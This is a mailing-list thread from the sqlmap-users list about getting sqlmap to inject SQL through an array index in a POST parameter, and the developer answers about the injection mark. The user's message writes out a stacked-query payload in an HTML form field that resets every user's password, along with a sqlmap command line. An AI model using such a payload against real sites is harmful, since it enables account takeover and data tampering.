Thanks man ;
I want to send an array with query in its index as value of "name" POST
variable .
Remember if i want inject it manually should try >
<input type="text" id="edit-name" name="name[1 ;UPDATE {users} SET pass=
'test123'; -- ]" value="" size="60" maxlength="60" class="form-text
required error">
So tried (sqlmap/1.0-dev) :
python sqlmap.py -u "http://localhost//?id=n&ssid=w";
--data="name[0*]=name" --risk=3 --flush-session --dbms=mysql
Sqlmap returns this error:
[WARNING] (custom) POST parameter '#1*' is not injectable
What does # mean here ?
And how to make it work under sqlmap ?
Regards
On Thu, Oct 23, 2014 at 11:00 AM, Miroslav Stampar <
[email protected]> wrote:
> Hi.
>
> You need to put a custom injection mark * at the place where you want
> sqlmap to inject. For example:
>
> ...name[1*]
>
> Bye
>
> p.s. your example with SELECT is not a proper one as queries are usually
> not supported in stacking
>
> On Thu, Oct 23, 2014 at 7:43 AM, a dehqan <[email protected]> wrote:
>
>> Hi Guys ,
>>
>> Is Sqlmap able to send an array instead of string while injecting?
>>
>> Like situation we have html form and we want manually send post variable
>> 'name' this way (value is obtained from array) :
>>
>> name="name[1 ;select * from users -- ]
>>
>> I want do it with Sqlmap , but how ?
>>
>>
>> Regards dehqan
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
------------------------------------------------------------------------------
_______________________________________________
sqlmap-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
